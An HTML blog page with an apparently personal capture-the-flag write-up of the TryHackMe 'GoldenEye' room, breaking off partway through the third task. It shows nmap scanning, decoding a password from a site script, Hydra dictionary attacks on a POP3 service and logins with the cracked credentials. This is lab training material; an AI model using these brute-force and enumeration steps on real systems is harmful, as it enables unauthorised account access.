<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="D K V V Varma">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/09/22/goldeneye/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="Greetings! Today, we will embark on a challenge by exploring a Capture the Flag (CTF) room on TryHackMe. Room link: GoldenEye TASK-1:IntroDeployed the machine and connect to ovpn in my attacker machin">
<meta property="og:type" content="article">
<meta property="og:title" content="GoldenEye">
<meta property="og:url" content="http://example.com/2024/09/22/GoldenEye/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Greetings! Today, we will embark on a challenge by exploring a Capture the Flag (CTF) room on TryHackMe. Room link: GoldenEye TASK-1:IntroDeployed the machine and connect to ovpn in my attacker machin">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/acwjp13l6xnij3wh9xadh/1.png?rlkey=3l10aztkrautl6bmzb30s04yy&st=0p7uvkv9&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/xw9z7jtkrdmr7hdg29gfp/2.png?rlkey=3ek3uptwup4aqpu8n859dcg4k&st=c2cfegu8&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/sdjsjfyf7xqhz1rzm515t/3.png?rlkey=cpzf4v98qlnq380ky6j1xcyvp&st=b6mz15e8&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/kdqhwwie5bouc3w7wq2jt/4.png?rlkey=pzbxzkptm4mogawl0ua9t8ujt&st=r8cytawa&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/v9omcobaxqfmxicnkpq47/6.png?rlkey=0305trgij8yd0qka455oukg5d&st=ks37d961&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/dt5s2fy87weeofqx7jnm2/7.png?rlkey=p2djthl2lq6xrn5vunfz84lub&st=lkw7t3vv&dl=0">
<meta property="og:image" content="https://8.dropbox.com/scl/fi/8d2l72yojt03bc60inxz0/8.png?rlkey=ai0krxc7m6qvbkhybikzox1iz&st=01faguv6&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/a4ffzbhzlp8fm6aofux5j/9.png?rlkey=gqu6vv9ad8fmwu7sfo1lgmc27&st=ji94ps9j&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/0wb5j9pvqdsklp86jgmo7/10.png?rlkey=gwbvnhzvp40pimxlgpsjgmxre&st=fu0hvvvj&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/0wb5j9pvqdsklp86jgmo7/10.png?rlkey=gwbvnhzvp40pimxlgpsjgmxre&st=fu0hvvvj&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/dffc5rfzno3ybnmo2cq0m/12.png?rlkey=csuvj49p8jj87e4ncxbap3u28&st=690f0jyj&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/rexhf7qfpf97xf1wziyk3/13.png?rlkey=txrppo704g3cn1t02sq02xkig&st=a6pu6sn9&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/x3e54jfs4vcjfqmwj3gkq/15.png?rlkey=8t1irspyrhk59fsdj2bvnd19f&st=hixba2lo&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ijs0buyweyqv8pyx0k49l/17.png?rlkey=n0au7ieod2klp4xr1etsyg16r&st=bjof5kx4&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/6qqpnsd8oot8viypjyq2y/18.png?rlkey=xohfuq3xfijpb86hjxfpwnkti&st=k2dzr9n7&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/p6wqop8r64izr6lh4r92o/20.png?rlkey=s9ld58mtzdi3q0ayesuq9ecgj&st=xge1fj1u&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/xnm7sngijdmzlrlt7utc4/21.png?rlkey=b2woetau6v8jegozm5iamno4r&st=h8xwgfn3&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/651krv7r6nkmhcxgt45gn/22.png?rlkey=33vwtvduruvaf359q8e60vdcl&st=g28rrf2o&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/9bmpugml2qpcumf2qtojq/23.png?rlkey=m3pndfg87yvezauqiiyfvyj9h&st=4wdch480&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ynyk3sb9fyd23o7txswgu/24.png?rlkey=3kbp6jb1v1seux6kpt041lpd9&st=3finwbtq&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/amjf5otd7ud39tie5hn42/25.png?rlkey=jn9fvskq3jtw316h89z2rjt9p&st=xj5mngfx&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ry2ppuculynnt75gyi6q2/26.png?rlkey=7mfnc9ovknoeibtik0dlo0z65&st=41i3fod6&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/h5kz48bq2bj5uhejmaqqs/27.png?rlkey=1ud7n1e7jc5gix5p5xh7i6jf1&st=6mhvj82j&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/qnnatod6w3qikbqmr5apx/28.png?rlkey=x1ioxgzgsibmujd2np92l694y&st=l8cp5rt5&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ha4jrf2desio7iv1yqu51/29.png?rlkey=lh44ytnytkjm04qeyspg847oh&st=hz0h58eh&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/1vt39xqllybeav58qhyrw/30.png?rlkey=3kek38g8ilgr8vzyeory7r9at&st=504f66lg&dl=0">
<meta property="article:published_time" content="2024-09-21T18:33:02.428Z">
<meta property="article:modified_time" content="2024-09-30T12:04:39.189Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="TryHackMe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dl.dropbox.com/scl/fi/acwjp13l6xnij3wh9xadh/1.png?rlkey=3l10aztkrautl6bmzb30s04yy&st=0p7uvkv9&dl=0">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&amp;st=hn686juk&amp;dl=0" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&amp;st=hn686juk&amp;dl=0">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&st=hn686juk&dl=0">
    <!--- Page Info-->
    
    <title>
        
            GoldenEye -
        
        DKVV&#39;s blog
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
        <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    
<script src="/js/libs/anime.min.js"></script>

    <h1 class="ml13">
        DKVV&#39;s blog
    </h1>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });


        anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [100,0],
                translateZ: 0,
                opacity: [0,1],
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i
            }).add({
            targets: '.ml13 .letter',
            translateY: [0,-100],
            opacity: [1,0],
            easing: "easeInExpo",
            duration: 1200,
            delay: (el, i) => 100 + 30 * i
        });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            hidePreloaderAfterTimeout(1000); // Hide after 1000 milliseconds once the window has loaded
        });

        // Backup failsafe: Hide preloader after a maximum of 5000 milliseconds, regardless of the window load event
        hidePreloaderAfterTimeout(5000);

        function hidePreloaderAfterTimeout(delay) {
            setTimeout(function () {
                var preloader = document.querySelector('.preloader');
                preloader.style.opacity = '0';
                setTimeout(function () {
                    preloader.style.display = 'none';
                }, 200);
            }, delay);
        }
    </script>
</div>
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    <!--- Font Part-->
    
    
    
    


    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":["Aspire Conquer Inspire"]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":false,"default":null},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":null,"enable":false,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"https://dl.dropbox.com/scl/fi/2kvpgh0u6as51zby0m1k3/Tron-wallpaper.png?rlkey=a4i210lfhgpma6mx35im5zhem&st=1ezkpxnx&dl=0","dark":"https://dl.dropbox.com/scl/fi/b4ibcd491p94r5i3o3nxo/tronbg.jpg?rlkey=uvm6n8l87w2ms3trt383o6k7y&st=jxf40cnb&dl=0"},"title":"Hello There!","subtitle":{"text":["In a digital world","skepticism is your armor"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":{"icon":"fab fa-github","link":"https://github.com/dkvvvarma"},"instagram":null,"zhihu":null,"twitter":"https://x.com/dkvvvarma","email":null,"linkedin":"nhttps://www.linkedin.com/in/dkvvvarma/"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://dl.dropbox.com/scl/fi/tfaps363m8w4oop0dr0sp/logo_tron.png?rlkey=4v0s2on6alnap1ynnhvt5e8a9&st=dcg7xklo&dl=0">
                </a>
            
            <a class="logo-title" href="/">
                
                DKVV&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">GoldenEye</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&st=hn686juk&dl=0">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">D K V V Varma</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Aspire Conquer Inspire</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-09-22 00:03:02</span>
        <span class="mobile">2024-09-22 00:03:02</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-09-30 17:34:39</span>
            <span class="mobile">2024-09-30 17:34:39</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/TryHackMe/">TryHackMe</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <p>Greetings! Today, we will embark on a challenge by exploring a Capture the Flag (CTF) room on TryHackMe.</p>
<h6 id="Room-link-GoldenEye"><a href="#Room-link-GoldenEye" class="headerlink" title="Room link: GoldenEye"></a><strong>Room link: <a class="link"   target="_blank" rel="noopener" href="https://tryhackme.com/r/room/goldeneye" >GoldenEye <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></strong></h6><h4 id="TASK-1-Intro"><a href="#TASK-1-Intro" class="headerlink" title="TASK-1:Intro"></a><strong>TASK-1:Intro</strong></h4><p>Deployed the machine and connect to ovpn in my attacker machine </p>
<p>1.<strong>First things first, connect to our network and deploy the machine.</strong></p>
<p>   Launched an NMAP scan with &#96;nmap -sV -p- 10.10.74.253 -Pn<br>    <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/acwjp13l6xnij3wh9xadh/1.png?rlkey=3l10aztkrautl6bmzb30s04yy&st=0p7uvkv9&dl=0"
                      alt="img1"
                ></p>
<ol start="2">
<li><p><strong>Use nmap to scan the network for all ports. How many ports are open?</strong></p>
<p>We have 4  open ports <code>25</code>,<code>80</code>,<code>55006</code>,<code>55007</code>.<br>For now let’s go with the interesting one port <code>80</code> and visit the webiste<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/xw9z7jtkrdmr7hdg29gfp/2.png?rlkey=3ek3uptwup4aqpu8n859dcg4k&st=c2cfegu8&dl=0"
                      alt="img2"
                ></p>
</li>
<li><p>Take a look on the website, take a dive into the source code too and remember to inspect all scripts.</p>
<p>After going to source you can find <code>terminal.js</code> and opening it up<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/sdjsjfyf7xqhz1rzm515t/3.png?rlkey=cpzf4v98qlnq380ky6j1xcyvp&st=b6mz15e8&dl=0"
                      alt="img3"
                ></p>
</li>
<li><p>Who needs to make sure they update their default password?<br> Ans: Boris<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/kdqhwwie5bouc3w7wq2jt/4.png?rlkey=pzbxzkptm4mogawl0ua9t8ujt&st=r8cytawa&dl=0"
                      alt="img4"
                ></p>
</li>
<li><p>What’s their password?</p>
</li>
</ol>
<p> You can find it encoded in <code>terminal.js</code>, copy it and head over to <code>cyberchef</code> to decode it. The encoded password is<br>    <code>&amp;#73;&amp;#110;&amp;#118;&amp;#105;&amp;#110;&amp;#99;&amp;#105;&amp;#98;&amp;#108;&amp;#101;&amp;#72;&amp;#97;&amp;#99;&amp;#107;&amp;#51;&amp;#114;</code></p>
<p>It is encoded in html entity , so decoding it in cyberchef, I got the password is<code>InvincibleHack3r</code>.</p>
<ol start="6">
<li><p>Now go use those credentials and login to a part of the site.</p>
<p>You can see in the homepage it says to go to <code>/sev-home/</code> to login. Head there and use the credentials to login.</p>
<p>After logging in , it shows a message about GoldenEye and a clip from<code>moonraker</code> fil playing on background.Upon inspecting the page source,you can find 2 certified GNO operators in comments at bottom of the code.</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/v9omcobaxqfmxicnkpq47/6.png?rlkey=0305trgij8yd0qka455oukg5d&st=ks37d961&dl=0"
                      alt="img5"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/dt5s2fy87weeofqx7jnm2/7.png?rlkey=p2djthl2lq6xrn5vunfz84lub&st=lkw7t3vv&dl=0"
                      alt="img6"
                ></p>
</li>
</ol>
<h4 id="TASK-2-It’s-mail-time…"><a href="#TASK-2-It’s-mail-time…" class="headerlink" title="TASK-2:It’s mail time…"></a><strong>TASK-2:It’s mail time…</strong></h4><p>Going on to next steps</p>
<ol>
<li><strong>Took a look at some of the other services that were found in nmap scan. The credentials are not re-usable?</strong></li>
</ol>
<p> <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://8.dropbox.com/scl/fi/8d2l72yojt03bc60inxz0/8.png?rlkey=ai0krxc7m6qvbkhybikzox1iz&st=01faguv6&dl=0"
                      alt="img7"
                ></p>
<ol start="2">
<li><p><strong>If those creds don’t seem to work, can you use another program to find other users and passwords? Maybe Hydra? What’s their new password</strong>?</p>
<p> To  crack this I utilized Hydra tool and found a password match.<br>Command:<br> <code>hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://&lt;IP&gt;:55007</code><br>The password for <code>natalya</code>  is <code>bird</code><br>   <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/a4ffzbhzlp8fm6aofux5j/9.png?rlkey=gqu6vv9ad8fmwu7sfo1lgmc27&st=ji94ps9j&dl=0"
                      alt="img8"
                ><br>This password isn’t the right answer for this question. So, on to crack Boris password.<br>  After some time,  hydra gave the result which i s <code>secret1!</code>.<br>   <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/0wb5j9pvqdsklp86jgmo7/10.png?rlkey=gwbvnhzvp40pimxlgpsjgmxre&st=fu0hvvvj&dl=0"
                      alt="img9"
                ></p>
</li>
<li><p><strong>Inspect port 55007, what services is configured to use this port?</strong></p>
<p>According to Nmap, Dovecot POP3 is running on port 55007. We can connect using <code>telnet</code></p>
</li>
<li><p>Logging in to the service using Boris password</p>
<p>  <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/0wb5j9pvqdsklp86jgmo7/10.png?rlkey=gwbvnhzvp40pimxlgpsjgmxre&st=fu0hvvvj&dl=0"
                      alt="img11"
                ></p>
</li>
<li><p><strong>What can you find on this service?</strong></p>
<p>Using the <code>LIST</code> command, I can find messages which are <code>emails</code>(answer)<br>The following is the result.</p>
</li>
</ol>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">LIST </span><br><span class="line">+3 messages:</span><br><span class="line">1 544</span><br><span class="line">2 373</span><br><span class="line">3 921</span><br></pre></td></tr></table></figure></div>

<ol start="6">
<li><p><strong>What user can break Boris codes?</strong></p>
<p>You can find this answer by reading those mails and also can confirm it by reading natalya mail.</p>
<p>You can read the mails using command <code>RETR &lt;msg no&gt;</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/dffc5rfzno3ybnmo2cq0m/12.png?rlkey=csuvj49p8jj87e4ncxbap3u28&st=690f0jyj&dl=0"
                      alt="img"
                ></p>
</li>
<li><p><strong>Using the users you found on this service, find other users passwords</strong></p>
<p> No Answer needed</p>
</li>
<li><p><strong>Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.</strong></p>
<p>The other user is <code>natalya</code> which can be cracked with same dictionary attack, since we already done it. Let’s log in to service<br>  <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/rexhf7qfpf97xf1wziyk3/13.png?rlkey=txrppo704g3cn1t02sq02xkig&st=a6pu6sn9&dl=0"
                      alt="img"
                ></p>
<p>In one of the emails, I found <code>Xenia</code> password.</p>
</li>
</ol>
<h4 id="TASK-3-GoldenEye-Operators-Training"><a href="#TASK-3-GoldenEye-Operators-Training" class="headerlink" title="TASK-3:GoldenEye Operators Training"></a><strong>TASK-3:GoldenEye Operators Training</strong></h4><p>In the above discovered email, there is the <code>severnaya-station.com</code> website. To get this working, you need up update your DNS records to reveal it.</p>
<ol>
<li><p>If you’re on Linux edit your “&#x2F;etc&#x2F;hosts” file and add:</p>
<p><code>&lt;machines ip&gt;</code> severnaya-station.com</p>
</li>
<li><p><strong>If you’re on Windows do the same but in the “c:\Windows\System32\Drivers\etc\hosts” file</strong></p>
<p><strong>Once you have done that, in your browser navigate to: <a class="link"   target="_blank" rel="noopener" href="http://severnaya-station.com/gnocertdir" >http://severnaya-station.com/gnocertdir <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>.</strong></p>
</li>
<li><p><strong>Try using the credentials you found earlier. Which user can you login as?</strong></p>
<p> Ans: <code>Xenia</code></p>
<pre><code>![img](https://dl.dropbox.com/scl/fi/1c9j26nlkk4dmd63fletp/14.png?rlkey=7n3o1l0glv6uavie8olzpk64a&amp;st=gadbmucl&amp;dl=0)
</code></pre>
<p> Have a poke around the site. What other user can you find?</p>
<pre><code>![img](https://dl.dropbox.com/scl/fi/x3e54jfs4vcjfqmwj3gkq/15.png?rlkey=8t1irspyrhk59fsdj2bvnd19f&amp;st=hixba2lo&amp;dl=0)
</code></pre>
<p> Ans:  <code>Doak</code></p>
</li>
<li><p>What was this users password?</p>
<p>Let’s perform dictionary attack again with Doak as username this time</p>
<p>  <img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/x3e54jfs4vcjfqmwj3gkq/15.png?rlkey=8t1irspyrhk59fsdj2bvnd19f&st=hixba2lo&dl=0"
                      alt="img"
                ></p>
<p>Ans: <code>goat</code></p>
<p>Use this users credentials to go through all the services you have found to reveal more emails.</p>
</li>
<li><p>What is the next user you can find from doak?</p>
<p> Ans: <code>dr_doak</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ijs0buyweyqv8pyx0k49l/17.png?rlkey=n0au7ieod2klp4xr1etsyg16r&st=bjof5kx4&dl=0"
                      alt="img"
                ></p>
</li>
